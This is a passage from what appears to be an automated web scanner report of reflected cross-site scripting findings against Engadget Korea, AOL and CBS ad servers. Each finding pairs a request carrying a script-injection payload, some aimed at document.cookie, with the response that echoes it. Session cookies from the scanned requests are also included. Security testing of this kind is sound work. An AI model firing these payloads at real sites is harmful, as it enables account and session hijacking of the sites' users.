Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvtbUuZj5vJxEUkDwMlJOsgKbmVHDqt4Kcn0KTUF/0deUdZiCRSos1CqUhGl1XqAEH7zHksG8xITY5THXxj8WzTdlHQIjiq9Y+FAYI85euir6Do4GrLG1EkqmEpwXxezbvIl4AiuSZ4ZCrX/77vlnUGM7HpTAF2DhReVhR7TOU1470j/9BJrtniv+IgNfvyKzE00a7wCJe7ePe7IHnJ7H2KLrq6ahNnaxYxLLlvHe+LD53r+LCotkMNiX9mlgWgAEcknWBeKwHPsSJ3VCJZoZ7cDTPsUdidVURwrAgb/MsJbgoigi2ltBfhOCaivnC1UIiLKELD4mXGsakA9t1iQGF0qYup5jI81NogauBDYJowplqvoh//d5t9yPle2ZzaY6jqeK89m/wmKNWoHaJE5+oiWpQVphkty/X8ubc3TAMd5r07ma7t45Rx7C8Npx7xHIJHwZ4AY0/2Ytwl0vQQA113HxICpl/zbE/xsCGLiKZZuxurqySgtFS4XbvfzPu1XnSgP9Q5dxZjEoe0UvwC2T6aSaAp9xkhzekAIlujH4HKply2GyMMosJqg82rP2UZ3iAsv7SxP2W6kl5b6DNtJTz0GXYN48f4jD/PdHb+8j8tdhZjtHbaeGVSRGza5AJVu+mgB673Fmkx0wsNwPGSqzYFlwV9a0OThrlEHS6UCXNjF2C7eCSatsCcdobOf3lMF2r0MPvBzw9+N7ZQhHQVQcUQpwgvcwrgiLGRCa8yrwOFz24JUFpkjz5evUnyg8l0pvA91zM; rsi_segs_1000000=pUPFJzOFbwIQV6md0KxP86Zaxas4kJU0YQB9xCH+WvCIK6fWAD/TMF+oiR03wpcG5Ry6Cgkl/Ex3N+/7fkoLF2ipWVTtwVIu3ml0PlMYqiCJFXKmA3mCNB+KiTy4AYVCGrnteGc5ldxUv0Fy5xCEx1dte7MrxGD0e139faxxIAQE27PHRsv3i0G2Xfhh6i1N778y5EqcWGbw5ubbWzFgsIDewjp6XBf0n6eBoYwTwDZgXgMhtLwzCnwmNsFxM3jH6YkXGc7+VEex37l4+nzxL4ANNjye7pTFZSW7zxsrZFfwXEDhZ+sgsLcn1dl/2FaBXeV4RorC22QCdcQcF1Pu; udm_0=MLv3NTPtKSpn3vMfiZZOyRAKrk8wciRr/slYqkTyBCB7BAX+Dx6TrDjE5LKrFBSTFs/8uavu/r9iwSnDA+W9dSqDaes9t4dFejCR08dP6IHlW4rc+W8rA8QoMaLiLOcF+s9bIQL0gA//+Eu6uWzNRABAVhUHvLzZuyq7rYoBhFJMVlrREn1ypIbsk0HcA7DI1wKn+5gOfkhYJs7jYyvvRrGWq1AOkrbimQHARfrq9b/dD/5G+Us9nhzWg74uWycenMpvoVXeSrCt6QEOLi+jRy6YvU6pru6mzAggYSnrL2Wqb0E9kInJojRPEVt539SqnhpgNTxxhgS7PA8LGjioYh/h1qYD0j0sFpXoyALivQFzDhfVR3N2lbYxFuqo7egqYN+RuNYcHlZoao3Ank7E0Xo3m5EPSOcW7zGqLp/YiV0aXSLFQjuneKLnzlNdw1ZYfqHShtAczuh1q7aBvogem3LhhIuWFMKvPYM0HrO/2ZQkIrJ/3QX4Ftd1vVEX67ty5JKkMlbN6qghJXxvKrftZ3sKAB1gceHc+oDSBlzQVli/rdeVNwZxTBIPjP8KZHW3ZwR3V7khqN5YSFk3d700p96pjlZZ/qgtkb36Q0pvi8MuAG15ezEUu/KjhlBQsSFl0nPeopc/b181DZ4bx6avTDuJlznKswOGvHeuRSV4ugT1N/MJiiaQWmQxHpCJFk8oX2gdjBp96nVudSAElyIHmizFVpDYwzIrCfNU93BCPsAKM6ZD7pkOC4iBM97tQhhl+0l4Yn8bCc3l7G2KBxT+3JGIOLtYDRi6pO6FGCucj2BpVMcExsnydlkrVnpYznoWz8Id9cmXNL0leV9+lFEC9ol09njurY0jVA4X6So1GvmVT8vtCcmuUw+HBleyLm5bT+WeHZcHrdcRv09iwtg5BRvRIS9f3Yrs3Ivjbx6MhTQPnnc3uzXgF5s4LfqR1fZeuy6ERN2opvKQsPaGjbAd5tn3tZW63eq/zSUaXDD/KKjrL/qXKPhqRpWv/+iA2jBvUhl+iDu660dQNJ16/JwFiJloks5Hr2FjxySt3ngy8NLWFjEQrQtDz8S/1EKOmxTGAPpZHMW0WZa39+QtVxiDlehHzgk55FLVqALTgIY67fI7pI35vdeeU1a2+2Vf1pDUS2d7zJ76zsTuoze+4uj0MGSrGHzuXtrTiW1K3ibEQjTfAJ10NasuQTQtbbzLuc+48t1l84Eg1O5lagwOumaQGxbIt9euhberwo3VRdY1fRvySWQX5AGx7l3tmV6KV1L1FlyfnIoHm9+nnwaUu5b06QjSt93zc4o2hmrkiHal; rsi_us_1000000=pUMdIj9HMAYU1O2Wcy9VhaUnnO3kqSOW7cwv688KTf4lzLByLK99sFdgyRpSewtLsqjv1EGWeoQZgT8GBbMy4C+WAGvKUzcl8ewvpGqJGapf0hlb6gqVHp1FnrFw6bHHdeElDxchEkBBA/aMfAv0/tNatMAEfNtLFb/yzYRSLc46LwnGJADodagM6Wca/VqJRtensSzktRzm4GHJVJSGkyeYJLQ9ykWgK3LbxN7C4mXJsOWvdeheswOfHvpS1K+NdyMeMvCkRYBb/dCoUFxY/4/wjpS/NwVx5iRePyh8dGorcBc1v+mttC7MB+rGIsCWck8flZTaDlfChAf0D6OmhvJYQ2qWLCUoghxVrMrMcC/+/YA2PyCkHWf0lmaSGwTl9cTAOg/OoNdTenkBpRpGyqvvjFySpQlcxN/ClBfvGyn8ABhz9MZMMQAGl4D8JNyF45kjLNzxI8iny+YVMrsJinbCpgaKRBQ7DjmxhdguZyZ5K4NCGD/zsVeSeGyB0OuEUIfQ2OAGscwWsBJyqyoPkxDS6ZCyHr4zWIMXP6V71lZXhNFqZUNL5MtKjCr5ID2PtAK2odsWWnZAdM24amasti2vUR2El8IQ29YQ3HvlB6T3uvxviRFFV3FQIJHlNYFgbrF+dn3dCuKaj3puI1+V8Ea0u4C8Gs95xmAq6pUz67TmTZH7A+786JiHd230WWkASw2LVjS9znPROOW/0PQXq0BULWhQ8ImFNBEBtbp++A6i2QgUdINTiaX4rgNIY7cknFzlul7MTwKT1FRTGCDrZm2y7Hi9cOHfczZKvyx4GExsEt9prTRdyLMR00nxKPqTJo26pK7K2v/mNRTDx0mmDsWiXkh7gEuH1rdY3880UmeJ/H0iXCGF0aSN4gTMIrl012zMpjxYdxtDjZtwatB/98R1+dkcFUWpvgB77+3EsG/GAS1cQLgK9AxKpFOGZlanKP0WaHfldw7qLfIh8CXZ/AJUUze9y/syub9qKwTG0wZmlnMv4Wk4SDHR6/1T523PpVjga2Zb2PL+JBUjU5M7dhtCP66Kf+fT8pAwqk34aJDx1gA0DTwaqnjM74Qi7Z+Vo0W+x3NceW8PSb+7WSB95DSZYCzBeno8V8bPMvygCTWE/j4cd/3IOh/31xLeurMpAJ08m3CRBxNzqDTaa1mONhgYucpeDS0l8Z/gXikSJDTo5InuMqom31ibabgrogWFRTEGsv0T7QbiG/ozHDWPLTECEc0tlRh5QoN6UmLqJOdsio2c8+02h3zDf0rTFsDgjVw2+177S1Sj0QZYjg/iOmE/VBnmfFshkfONmU1MWc+QSJoCH5firGPaFzZNmVpeVedPFaxU/xYisHEVC2bfr98PzgcMWLslzCo+mxFHX32wzP26/nxBopPYLTdS+Ix9mZ6F+RFB4YMVX2P4uxP+pevVka/GmgaPJOwly8YSrYDowubiRwjsJ++wWZegN/5WKXoTAY5ehaixXqOIAFK9

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 20:19:22 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 07 Feb 2011 20:19:22 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sun, 06 Feb 2011 20:19:21 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J055326E2A8<SCRIPT>ALERT(1)</SCRIPT>5664779B5A2" was not recognized.
*/

1.121. http://kr.engadget.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kr.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db35a"-alert(1)-"5ea201beed3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?db35a"-alert(1)-"5ea201beed3=1 HTTP/1.1
Host: kr.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:45 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999948
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 75928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta content="text/html;
...[SNIP]...
65.server="";
s_265.channel="kr.engadget";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,kr.engadget.com";
s_265.prop1="Engadget";
s_265.prop2="Home";
s_265.prop12="http://kr.engadget.com/?db35a"-alert(1)-"5ea201beed3=1";
s_265.prop16="Engadget Korea";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="399";

var s_code=s_265.t();if(s_code)document.write(s_code)//-
...[SNIP]...

1.122. http://learn2.aol.com/learn.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn2.aol.com
Path:   /learn.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa475<script>alert(1)</script>947c52ed946 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /learn.jsaa475<script>alert(1)</script>947c52ed946?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb HTTP/1.1
Host: learn2.aol.com
Proxy-Connection: keep-alive
Referer: http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
ntCoent-Length: 145
X-Response-Time: 0ms
Date: Sun, 06 Feb 2011 20:41:46 GMT
Connection: keep-alive
Content-Length: 145

Cannot GET /learn.jsaa475<script>alert(1)</script>947c52ed946?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb

1.123. http://learn2.aol.com/learn.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn2.aol.com
Path:   /learn.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 96580<script>alert(1)</script>baa2a9fd9f7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /learn.js?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb96580<script>alert(1)</script>baa2a9fd9f7 HTTP/1.1
Host: learn2.aol.com
Proxy-Connection: keep-alive
Referer: http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Cache-Control: max-age=0, no-store, must-revalidate
ntCoent-Length: 94
X-Response-Time: 2ms
Date: Sun, 06 Feb 2011 20:41:44 GMT
Set-Cookie: learnkey=2e5503fcd7522e879beca62d0fd2d6ff
Connection: keep-alive
Content-Length: 94

learn_cb96580<script>alert(1)</script>baa2a9fd9f7({"error":"Insert + Update failed, retry."});

1.124. http://mads.cbs.com/mac-ad [ADREQ&SP parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 3cf3a<a>c5232a83a81 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=803cf3a<a>c5232a83a81&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:09 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:09 GMT
Content-Length: 609

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=803cf3a<a>c5232a83a81&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='803352328381' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.125. http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload fc4eb<a>1f38f7daa6b was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=72427910&ADREQ&beacon=1fc4eb<a>1f38f7daa6b&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404; CBS_ADV_VAL=b%3Bbc%3Dtrue; _PACIFIC_COMMENTS=Ad+System+Call%28ocp.cbs.com%29%3A+http%3A%2F%2Fad.doubleclick.net%2Fad%2Fcan%2Fcbs%2Fp8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3Bsite%3Dentertainment%3Bdpart%3Dprimetime%3Bshow%3Dbigbangtheory%3Bfeat%3Dfull_episodes%3Bfeat%3Drebroadcast%3Bpartner%3Dcbs%3Bvid%3D1777408650%3Boutlet%3DCBS%2520Production%3Bpid%3D8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3BnoAd%3D%3Btype%3Dros%3Bformat%3DMPEG4%3Blength%3D1300300%3Bpos%3D1%3Bsz%3D320x240%3BplayerVersion%3DUVP2.7.1%3BClipLength%3DlongFormat%3Badv%3Db%3Bbc%3Dtrue%3Bord%3D64391%3F; PACIFIC_TRACE=c13-ad-xw1.cnet.com.12970243494080.7474704464438863; CBS_CAT_EXCL=1%3A

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:39:44 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:39:44 GMT
Content-Length: 497

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=72427910&ADREQ&beacon=1fc4eb<a>1f38f7daa6b&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1413876' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw9.cnet.com::1566353728 2
...[SNIP]...

1.126. http://mads.cbs.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa822'%3balert(1)//7c0ff5d4906 was submitted in the BRAND parameter. This input was echoed as fa822';alert(1)//7c0ff5d4906 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57fa822'%3balert(1)//7c0ff5d4906&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:49 GMT
Server: Apache/2.2
Content-Length: 1176
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57fa822'%3balert(1)//7c0ff5d4906&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=15150&amp;sg=1815&amp;o=19650%253a19806%253a&amp;h=cn&amp;p=2&amp;b=57fa822';alert(1)//7c0ff5d4906&amp;l=en_US&amp;site=164&amp;pt=6711&amp;nd=19806&amp;pid=&amp;cid=&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e6:4D4EFAF8CFEA5&amp;orh=cbs.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=ww
...[SNIP]...

1.127. http://mads.cbs.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 6afe3<a>ee014234579 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=576afe3<a>ee014234579&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:43 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:35:43 GMT
Content-Length: 626

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=576afe3<a>ee014234579&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAP
...[SNIP]...

1.128. http://mads.cbs.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload 26971*/alert(1)//df28e5b63e6 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=5726971*/alert(1)//df28e5b63e6&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:51 GMT
Server: Apache/2.2
Content-Length: 1175
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=5726971*/alert(1)//df28e5b63e6&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.129. http://mads.cbs.com/mac-ad [CELT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 35ae0<a>44ed3893763 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

